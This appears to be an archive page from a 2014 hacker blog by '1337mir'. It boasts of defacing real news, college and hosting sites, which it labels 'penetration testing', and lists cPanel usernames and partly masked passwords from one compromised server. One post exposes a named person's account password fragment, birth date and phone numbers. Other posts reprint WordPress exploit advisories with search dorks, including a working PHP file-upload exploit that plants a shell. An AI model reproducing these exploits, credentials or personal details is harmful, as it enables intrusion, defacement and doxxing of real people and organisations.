1337mir

About 1337mir

This author has not yet filled in any details.
So far 1337mir has created 49 entries.

WordPress Booking System SQL Injection vulnerable

By |May 27th, 2014|

Exploit Title: WordPress Booking System (Booking Calendar) plugin SQL Injection
Release Date: 2014-05-21
Author: maodun
Contact: Twitter: @conmancm
Software Link: http://wordpress.org/support/plugin/booking-system
Affected version: < 1.3
Google Dork: inurl:/wp-content/plugins/booking-system/
REF: CVE-2014-3210

Introduction:
Booking System is great for booking hotel rooms, apartments, houses,
villas, rooms etc, make appointments to doctors, dentists, lawyers,
beauty salons, spas, massage therapists etc or schedule events.

SQLi – Proof Of Concept:
vulnerable path:
/wp-content/plugins/booking-system/dopbs-backend-forms.php
vulnerabile parameter:$_POST[‘booking_form_id’]
POC:
POST […]

Comments Off on WordPress Booking System SQL Injection vulnerable

server saturno.tropicalserver.net penetrate and security

By |May 11th, 2014|

server saturno.tropicalserver.net penetrate and security tested by 1337mir

ip:188.165.93.13
host:saturno.tropicalserver.net
root user: info2com
root password: in*****(hidden for security reason)
login: http://188.165.93.13:2082/

defaced page link: http://zone-h.net/mirror/id/22343943

notified all user to change password and sent them vulnerability details via email.

cpanel username and password below:
username:abclviaj
password:*****(hidden for security reason)
username:bandido
password:*****(hidden for security reason)
username:barthe
password:*****(hidden for security reason)
username:bit2man
password:*****(hidden for security reason)
username:centabac
password:6*****(hidden for security reason)
username:chaparro
password:6*****(hidden for security reason)
username:chinxeto
password:6*****(hidden for security […]

Comments Off on server saturno.tropicalserver.net penetrate and security

O TV Lebanon penetrate and hacked

By |May 4th, 2014|

O TV Lebanon penetrate and hacked By 1337MiR.
website address: http://www.otv.com.lb
ip: 65.254.41.214
date: 05-04-14

defaced page: http://www.otv.com.lb/1337mir.html
cache mirror: http://dark-h.org/deface/id/57336

contacted them , but didnt respond.

screenshot:

Comments Off on O TV Lebanon penetrate and hacked

Kesserwen Al Asiya Newspaper website penetration testing

By |May 3rd, 2014|

Kesserwen Al Asiya Newspaper website penetration testing by 1337mir.
website: http://kesserwen.org/
ip: 192.217.123.88
date: 05-03-2014 09:36AM
deface page: http://kesserwen.org/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22295807

contacted  them, but didn’t respond.

screenshot:

Comments Off on Kesserwen Al Asiya Newspaper website penetration testing

WordPress plugin EZPZ One Click Backup Command Injection

By |May 2nd, 2014|

Product: WordPress plugin EZPZ One Click Backup
Vulnerability type: CWE-78 OS Command Injection
Vulnerable versions: 12.03.10 and some earlier versions
google Dork: intext:plugins/ezpz-one-click-backup/
credits: Henri Salo
Fixed version: N/A
Solution: Remove plugin
Vendor notification: Contact details N/A
WordPress plugins team notification: 2014-04-30
Risk: High
CVE: CVE-2014-3114

Vulnerability Details:

Contains a flaw that is triggered as input passed via the ‘cmd’ parameter in
ezpz-archive-cmd.php is not properly sanitized. With […]

Comments Off on WordPress plugin EZPZ One Click Backup Command Injection

Blue Cliff College website penetrate and security tested

By |May 1st, 2014|

Blue Cliff College website penetrate and security tested by 1337mir.

website address: http://bluecliffcollege.edu/
ip: 216.92.176.122
defaced page: http://bluecliffcollege.edu/1337mir.html
zone-h mirror: zone-h.net/mirror/id/22285856
and more 100+ site defaced. “zone-h.net/archive/notifier=1337MiR/” and “zone-h.net/archive/notifier=leetsec/published=0”

 

conversation with them:
#1

Comments Off on Blue Cliff College website penetrate and security tested

Scammer Michael Scheaffery’s skype account hacked

By |April 30th, 2014|

Scammer Michael Scheaffery’s skype account hacked by 1337mir.

skype id: michael.scheaffery
skype password: fruit*****
first name: Michael
last name: Scheaffery
birth-date: 03-11-1958
Name aliases: Mechael, Michale, Michel, Mick, Mickey, Micky, Mihael, Mike, Miky
Age:58 (56)
Location(s):Viriginia(US), Lagos (Nigeria), Also claims to be in:London (UK)
Address(es):unknown
Phone number(s):+14192087257; 447035955183; 447700009793
E-mail address(es):[email protected]

skype account screenshot:

 

photo:

scammer full info: http://www.male-scammers.com/the-scammers.asp?id=675

Comments Off on Scammer Michael Scheaffery’s skype account hacked

WordPress Themes Theagency File Upload Vulnerability

By |April 29th, 2014|

Title : WordPress Themes Theagency File Upload Vulnerability
Author : AnonBoy
Google Dork : inurl:/wp-content/themes/theagency
Date : 21/04/2014
Facebook : https://www.facebook.com/nufailienafratsim.moechtar
Vandor : N/a
Tested on : Windows 7

POC:
< ?- php

$uploadfile=”x.php.jpg”; $ch = curl_init(“http://localhost/wp-content/themes/theagency/includes/uploadify/uploadify.php”); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access:
http://localhost/wp-content/themes/theagency/includes/uploadify/uploads/x.php.jpg
————————————————————————————–

Greeting:./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan
./Gantengers Crew

Comments Off on WordPress Themes Theagency File Upload Vulnerability